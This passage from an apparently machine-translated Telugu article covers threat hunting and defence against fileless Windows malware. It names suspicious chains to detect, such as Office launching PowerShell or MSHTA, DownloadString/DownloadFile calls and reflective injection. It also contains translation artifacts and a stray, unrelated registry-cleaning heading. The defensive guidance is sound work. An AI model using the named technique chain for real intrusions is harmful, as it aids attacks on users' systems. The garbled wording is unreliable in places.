వేట కోసం, వీటి గురించి ప్రశ్నలపై దృష్టి పెట్టండి: పవర్‌షెల్/MSHTA వైపు ఆఫీస్ ద్వారా ప్రక్రియలను సృష్టించడం, వాదనలతో డౌన్‌లోడ్ స్ట్రింగ్/డౌన్‌లోడ్ ఫైల్స్పష్టమైన అస్పష్టత, ప్రతిబింబ ఇంజెక్షన్లు మరియు అనుమానాస్పద TLDలకు అవుట్‌బౌండ్ నెట్‌వర్క్‌లతో కూడిన స్క్రిప్ట్‌లు. శబ్దాన్ని తగ్గించడానికి కీర్తి మరియు ఫ్రీక్వెన్సీతో ఈ సంకేతాలను క్రాస్-రిఫరెన్స్ చేయండి.

ప్రతి ఇంజిన్ ఈరోజు ఏమి గుర్తించగలదు?

మైక్రోసాఫ్ట్ యొక్క ఎంటర్‌ప్రైజ్ సొల్యూషన్‌లు AMSI, ప్రవర్తనా విశ్లేషణలను మిళితం చేస్తాయి, జ్ఞాపకశక్తిని పరిశీలించండి మరియు బూట్ సెక్టార్ రక్షణ, అలాగే ఉద్భవిస్తున్న ముప్పులను ఎదుర్కోవడానికి క్లౌడ్-ఆధారిత ML నమూనాలు. ఇతర విక్రేతలు మార్పుల యొక్క స్వయంచాలక రోల్‌బ్యాక్‌తో హానికరమైన సాఫ్ట్‌వేర్ నుండి నిరపాయకరమైన సాఫ్ట్‌వేర్‌ను వేరు చేయడానికి కెర్నల్-స్థాయి పర్యవేక్షణను అమలు చేస్తారు.

ఆధారంగా ఒక విధానం అమలు కథలు ఇది మూల కారణాన్ని గుర్తించడానికి (ఉదాహరణకు, గొలుసును ప్రేరేపించే Outlook అటాచ్‌మెంట్) మరియు మొత్తం ట్రీని తగ్గించడానికి మిమ్మల్ని అనుమతిస్తుంది: స్క్రిప్ట్‌లు, కీలు, టాస్క్‌లు మరియు ఇంటర్మీడియట్ బైనరీలు, కనిపించే లక్షణంలో చిక్కుకోకుండా ఉండటానికి.

సాధారణ తప్పులు మరియు వాటిని ఎలా నివారించాలి

ఏదైనా విచ్ఛిన్నం చేయకుండా విండోస్ రిజిస్ట్రీని ఎలా శుభ్రం చేయాలి

ప్రత్యామ్నాయ నిర్వహణ ప్రణాళిక లేకుండా పవర్‌షెల్‌ను నిరోధించడం అసాధ్యమే కాదు, ఇంకా ఉన్నాయి పరోక్షంగా దానిని ప్రేరేపించే మార్గాలుమాక్రోలకు కూడా ఇది వర్తిస్తుంది: మీరు వాటిని పాలసీలు మరియు సంతకాలతో నిర్వహించండి, లేదా వ్యాపారం దెబ్బతింటుంది. టెలిమెట్రీ మరియు ప్రవర్తనా నియమాలపై దృష్టి పెట్టడం మంచిది.

అప్లికేషన్లను వైట్‌లిస్ట్ చేయడం వల్ల ప్రతిదీ పరిష్కారమవుతుందని నమ్మడం మరొక సాధారణ తప్పు: ఫైల్‌లెస్ టెక్నాలజీ ఖచ్చితంగా దీనిపై ఆధారపడి ఉంటుంది. విశ్వసనీయ యాప్‌లునియంత్రణ వారు అనుమతించబడ్డారో లేదో మాత్రమే కాకుండా వారు ఏమి చేస్తారు మరియు వారు ఎలా సంబంధం కలిగి ఉంటారు అనేదాన్ని గమనించాలి.

పైన పేర్కొన్న అన్నింటితో, మీరు నిజంగా ముఖ్యమైన వాటిని పర్యవేక్షించినప్పుడు ఫైల్‌లెస్ మాల్వేర్ "దెయ్యం"గా నిలిచిపోతుంది: ప్రవర్తన, జ్ఞాపకశక్తి మరియు మూలాలు ప్రతి అమలు యొక్క. AMSI, రిచ్ ప్రాసెస్ టెలిమెట్రీ, నేటివ్ విండోస్ 11 నియంత్రణలు మరియు ప్రవర్తనా విశ్లేషణతో EDR పొరను కలపడం మీకు ప్రయోజనాన్ని ఇస్తుంది. కమాండ్ లైన్‌లు మరియు ప్రాసెస్ ట్రీలకు ప్రాధాన్యతనిచ్చే మాక్రోలు మరియు పవర్‌షెల్, WMI/రిజిస్ట్రీ ఆడిటింగ్ మరియు వేట కోసం వాస్తవిక విధానాలను సమీకరణానికి జోడించండి మరియు అవి ధ్వనించే ముందు ఈ గొలుసులను కత్తిరించే రక్షణ మీకు ఉంటుంది.

సంబంధిత వ్యాసం:
కంప్యూటర్ నెట్‌వర్క్‌లు